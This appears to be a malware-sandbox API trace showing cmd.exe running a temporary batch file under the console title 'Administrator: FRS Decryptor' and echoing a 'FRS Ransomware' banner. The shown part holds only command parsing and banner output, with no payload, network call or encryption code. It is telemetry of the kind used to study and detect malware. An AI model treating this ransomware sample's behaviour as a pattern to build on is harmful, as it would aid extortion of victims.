lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.889] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.889] GetLastError () returned 0x2 [0068.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.889] GetLastError () returned 0x2 [0068.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.889] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.890] GetLastError () returned 0x2 [0068.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.890] GetLastError () returned 0x2 [0068.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.890] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.891] GetLastError () returned 0x2 [0068.891] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.891] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.891] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.891] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.891] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.891] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.892] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.892] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.892] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.892] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.892] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.892] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.892] GetFileType (hFile=0xc) returned 0x2 [0068.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.892] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.892] _get_osfhandle (_FileHandle=1) returned 0xc [0068.892] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.893] _get_osfhandle (_FileHandle=1) returned 0xc [0068.893] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.893] _get_osfhandle (_FileHandle=1) returned 0xc [0068.893] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.893] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.893] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.894] SetConsoleInputExeNameW () returned 0x1 [0068.894] GetConsoleOutputCP () returned 0x1b5 [0068.894] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.894] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.894] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.894] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.894] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.894] SetFilePointer (in: hFile=0xa0, lDistanceToMove=308, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x134 [0068.895] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.895] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x134 [0068.895] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1cc1, lpOverlapped=0x0) returned 1 [0068.895] SetFilePointer (in: hFile=0xa0, lDistanceToMove=409, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x199 [0068.895] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=101, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo. FRS Decryptor FRS Ransomware\r\n") returned 101 [0068.895] GetFileType (hFile=0xa0) returned 0x1 [0068.895] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.895] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x199 [0068.896] _tell (_FileHandle=3) returned 409 [0068.896] _close (_FileHandle=3) returned 0 [0068.896] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.896] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.896] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.896] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.896] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.896] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.896] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.896] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.896] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.896] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.896] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.896] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.896] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.896] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.896] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.896] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.896] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.896] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.896] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.896] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.896] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.896] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.896] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.896] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.896] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.896] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.896] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.896] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.896] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.896] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.896] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.896] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.896] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.896] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.896] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.897] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.897] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.897] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.897] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.897] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.897] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.897] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.897] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.897] SetErrorMode (uMode=0x0) returned 0x0 [0068.897] SetErrorMode (uMode=0x1) returned 0x0 [0068.897] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.897] SetErrorMode (uMode=0x0) returned 0x1 [0068.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.897] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.897] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.897] GetLastError () returned 0x2 [0068.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.898] GetLastError () returned 0x2 [0068.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.898] GetLastError () returned 0x2 [0068.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.898] GetLastError () returned 0x2 [0068.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.899] GetLastError () returned 0x2 [0068.899] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.900] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.900] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.900] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.900] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.900] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.900] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.900] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.900] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.900] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.900] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.900] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.900] GetFileType (hFile=0xc) returned 0x2 [0068.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.900] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.900] _get_osfhandle (_FileHandle=1) returned 0xc [0068.900] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x60, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x60) returned 1 [0068.901] _get_osfhandle (_FileHandle=1) returned 0xc [0068.901] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.901] _get_osfhandle (_FileHandle=1) returned 0xc [0068.901] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.901] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.901] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.902] SetConsoleInputExeNameW () returned 0x1 [0068.902] GetConsoleOutputCP () returned 0x1b5 [0068.902] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.902] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.902] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.902] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.902] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.902] SetFilePointer (in: hFile=0xa0, lDistanceToMove=409, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x199 [0068.903] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x199 [0068.903] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1c5c, lpOverlapped=0x0) returned 1 [0068.903] SetFilePointer (in: hFile=0xa0, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0068.903] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n FRS Decryptor FRS Ransomware\r\n") returned 7 [0068.903] GetFileType (hFile=0xa0) returned 0x1 [0068.903] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.903] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0068.903] _tell (_FileHandle=3) returned 416 [0068.903] _close (_FileHandle=3) returned 0 [0068.903] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.903] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.903] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.903] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.903] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.903] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.903] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.903] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.903] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.903] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.903] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.903] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.903] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.903] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.903] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.903] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.903] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.903] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.903] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.903] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.903] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.903] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.903] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.904] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.904] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.904] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.904] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.904] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.904] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.904] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.904] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.904] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.904] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.904] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.904] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.904] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.904] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.904] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.904] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.904] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.904] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.904] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.904] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.904] SetErrorMode (uMode=0x0) returned 0x0 [0068.904] SetErrorMode (uMode=0x1) returned 0x0 [0068.904] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.904] SetErrorMode (uMode=0x0) returned 0x1 [0068.904] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.904] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.904] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.904] GetLastError () returned 0x2 [0068.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.905] GetLastError () returned 0x2 [0068.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.905] GetLastError () returned 0x2 [0068.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.905] GetLastError () returned 0x2 [0068.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.906] GetLastError () returned 0x2 [0068.906] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.907] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.907] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.907] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.907] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.907] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.907] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.907] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.907] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.907] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.907] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.907] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.907] GetFileType (hFile=0xc) returned 0x2 [0068.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.907] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.907] _get_osfhandle (_FileHandle=1) returned 0xc [0068.907] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.908] _get_osfhandle (_FileHandle=1) returned 0xc [0068.908] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.908] _get_osfhandle (_FileHandle=1) returned 0xc [0068.908] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.908] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.908] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.909] SetConsoleInputExeNameW () returned 0x1 [0068.909] GetConsoleOutputCP () returned 0x1b5 [0068.909] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.909] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.910] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.910] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.910] SetFilePointer (in: hFile=0xa0, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0068.910] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0068.910] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1c55, lpOverlapped=0x0) returned 1 [0068.910] SetFilePointer (in: hFile=0xa0, lDistanceToMove=519, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x207 [0068.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=103, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo. _____________________________________________________________________________________________\r\n") returned 103 [0068.910] GetFileType (hFile=0xa0) returned 0x1 [0068.910] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.910] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x207 [0068.910] _tell (_FileHandle=3) returned 519 [0068.910] _close (_FileHandle=3) returned 0 [0068.910] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.910] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.910] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.910] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.910] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.910] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.910] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.910] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.910] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.910] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.910] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.910] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.910] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.910] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.910] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.911] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.911] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.911] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.911] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.911] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.911] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.911] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.911] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.911] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.911] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.911] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.911] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.911] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 